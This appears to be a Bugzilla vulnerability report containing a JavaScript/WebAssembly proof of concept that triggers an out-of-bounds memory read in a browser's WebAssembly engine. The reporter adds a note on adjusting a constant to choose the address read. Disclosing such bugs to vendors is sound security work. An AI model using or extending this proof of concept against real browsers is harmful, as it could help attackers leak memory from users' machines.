Bugzilla

```
var wasm_code = wasmTextToBinary(`
(module
  (type (;0;) (sub (array (mut funcref))))
  (type (;1;) (sub (array (mut i32))))
  (type (;2;) (func))
  (func (;0;) (type 2)
    loop ;; label = @1
      i32.const 0
      ref.i31
      ref.cast anyref
      ref.cast (ref null 1)
      ref.test (ref null 0)
      i64.const 0
      i64.atomic.rmw32.or_u
      i32.const 1
      br_if 0 (;@1;)
      drop
    end
  )
  (memory (;0;) 0 3200)
  (export "main" (func 0))
)
`);
var wasm_module = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_module);
var f = wasm_instance.exports.main;
f();
```
This vulnerability allows for out-of-bounds reading of memory data at the location i32.const multiplied by 2 plus 9.
For example, i32.const 0 can be modified to i32.const 20, which allows reading the data at the location 20*2+9